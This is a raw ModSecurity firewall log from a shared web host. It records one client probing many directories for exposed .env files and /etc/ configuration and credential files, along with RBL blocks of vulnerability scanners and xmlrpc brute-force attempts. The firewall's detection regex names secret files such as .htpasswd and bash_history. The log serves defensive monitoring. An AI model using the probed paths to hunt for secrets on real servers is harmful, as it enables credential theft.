[Tue May 26 14:01:56.407725 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto6QAAWw4"]
[Tue May 26 14:01:56.423024 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto7AAAWwY"]
[Tue May 26 14:01:56.429527 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto5QAAW3A"]
[Tue May 26 14:01:56.436863 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto9QAAWwE"]
[Tue May 26 14:01:56.440144 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto8wAAWxc"]
[Tue May 26 14:01:56.444363 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto8gAAW2I"]
[Tue May 26 14:01:56.447011 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto7gAAWwA"]
[Tue May 26 14:01:56.451512 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto8AAAW3I"]
[Tue May 26 14:01:56.457121 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto8QAAWxI"]
[Tue May 26 14:01:56.466804 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto7QAAWw8"]
[Tue May 26 14:01:56.590928 2026] [security2:error] [pid 578581:tid 578809] [client 4.193.189.92:2445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/goods.php"] [unique_id "ahVafJm_8al1sb-umPtpFwAAAGI"]
[Tue May 26 14:01:56.607383 2026] [security2:error] [pid 578581:tid 578603] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/cron/.env"] [unique_id "ahVafJm_8al1sb-umPtpGAAACxU"]
[Tue May 26 14:01:56.608400 2026] [security2:error] [pid 578581:tid 578698] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/crm/.env"] [unique_id "ahVafJm_8al1sb-umPtpGQAAC3Q"]
[Tue May 26 14:01:56.630972 2026] [security2:error] [pid 578581:tid 578598] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/current/.env"] [unique_id "ahVafJm_8al1sb-umPtpGgAACxA"]
[Tue May 26 14:01:56.671600 2026] [security2:error] [pid 578581:tid 578604] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/dev/.env"] [unique_id "ahVafJm_8al1sb-umPtpHAAACxY"]
[Tue May 26 14:01:56.672535 2026] [security2:error] [pid 578581:tid 578604] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/development/.env"] [unique_id "ahVafJm_8al1sb-umPtpIQAACxY"]
[Tue May 26 14:01:56.672608 2026] [security2:error] [pid 578581:tid 578707] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/develop/.env"] [unique_id "ahVafJm_8al1sb-umPtpIAAAC30"]
[Tue May 26 14:01:56.672743 2026] [security2:error] [pid 578581:tid 578610] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/developer/.env"] [unique_id "ahVafJm_8al1sb-umPtpIgAACxw"]
[Tue May 26 14:01:56.674330 2026] [security2:error] [pid 578581:tid 578703] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/demo/.env"] [unique_id "ahVafJm_8al1sb-umPtpHQAAC3k"]
[Tue May 26 14:01:56.731794 2026] [security2:error] [pid 578581:tid 578830] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpCwAAAHc"]
[Tue May 26 14:01:56.790405 2026] [security2:error] [pid 578581:tid 578772] [client 202.141.30.10:65284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVafJm_8al1sb-umPtpKQAAAD0"]
[Tue May 26 14:01:56.790539 2026] [security2:error] [pid 578581:tid 578772] [client 202.141.30.10:65284] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVafJm_8al1sb-umPtpKQAAAD0"]
[Tue May 26 14:01:57.308207 2026] [security2:error] [pid 578581:tid 578783] [client 4.193.189.92:6403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/g.php"] [unique_id "ahVafZm_8al1sb-umPtpOQAAAEg"]
[Tue May 26 14:01:57.324034 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpFQAACwg"]
[Tue May 26 14:01:57.333810 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpEwAAC2Q"]
[Tue May 26 14:01:57.334870 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpFAAACxQ"]
[Tue May 26 14:01:57.353234 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpFgAAC3U"]
[Tue May 26 14:01:57.401444 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpIwAACyo"]
[Tue May 26 14:01:57.403900 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpLQAACxk"]
[Tue May 26 14:01:57.404976 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpJAAACwk"]
[Tue May 26 14:01:57.416431 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpGwAACxE"]
[Tue May 26 14:01:57.417587 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpJQAAC3E"]
[Tue May 26 14:01:57.419842 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpLAAAC14"]
[Tue May 26 14:01:57.424212 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpHgAACxs"]
[Tue May 26 14:01:57.425893 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpLwAACyA"]
[Tue May 26 14:01:57.433142 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpLgAACx0"]
[Tue May 26 14:01:57.451252 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpHwAAC34"]
[Tue May 26 14:01:57.452658 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpJgAACxM"]
[Tue May 26 14:01:57.466714 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafJm_8al1sb-umPtpKwAAC38"]
[Tue May 26 14:01:57.563961 2026] [security2:error] [pid 578581:tid 578621] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/erp/.env"] [unique_id "ahVafZm_8al1sb-umPtpSgAAESc"]
[Tue May 26 14:01:57.569075 2026] [security2:error] [pid 578581:tid 578653] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVafZm_8al1sb-umPtpTAAAEUc"]
[Tue May 26 14:01:57.629282 2026] [security2:error] [pid 578581:tid 578651] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/etc/boto.cfg"] [unique_id "ahVafZm_8al1sb-umPtpTgAAEUU"]
[Tue May 26 14:01:57.629868 2026] [security2:error] [pid 578581:tid 578626] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/fe/.env"] [unique_id "ahVafZm_8al1sb-umPtpTQAAESw"]
[Tue May 26 14:01:57.710185 2026] [security2:error] [pid 578581:tid 578633] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/front/.env"] [unique_id "ahVafZm_8al1sb-umPtpUwAAETM"]
[Tue May 26 14:01:57.715127 2026] [security2:error] [pid 578581:tid 578630] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/frontend/.env"] [unique_id "ahVafZm_8al1sb-umPtpVQAAETA"]
[Tue May 26 14:01:58.023172 2026] [security2:error] [pid 578581:tid 578781] [client 129.222.147.134:65372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVafZm_8al1sb-umPtpYAAAAEY"]
[Tue May 26 14:01:58.023356 2026] [security2:error] [pid 578581:tid 578781] [client 129.222.147.134:65372] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVafZm_8al1sb-umPtpYAAAAEY"]
[Tue May 26 14:01:58.044894 2026] [security2:error] [pid 578581:tid 578818] [client 4.193.189.92:6679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/hplfuns.php"] [unique_id "ahVafpm_8al1sb-umPtpZQAAAGs"]
[Tue May 26 14:01:58.316801 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpQAAAEXg"]
[Tue May 26 14:01:58.330388 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpQQAAEXw"]
[Tue May 26 14:01:58.333042 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpQgAAESM"]
[Tue May 26 14:01:58.388930 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpQwAAESI"]
[Tue May 26 14:01:58.391828 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpUAAAEXo"]
[Tue May 26 14:01:58.401939 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpSwAAETo"]
[Tue May 26 14:01:58.402581 2026] [security2:error] [pid 578581:tid 578697] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpSQAAEXM"]
[Tue May 26 14:01:58.405966 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpUgAAER4"]
[Tue May 26 14:01:58.406734 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpXgAAETs"]
[Tue May 26 14:01:58.407052 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpWQAAETQ"]
[Tue May 26 14:01:58.421768 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpRwAAESQ"]
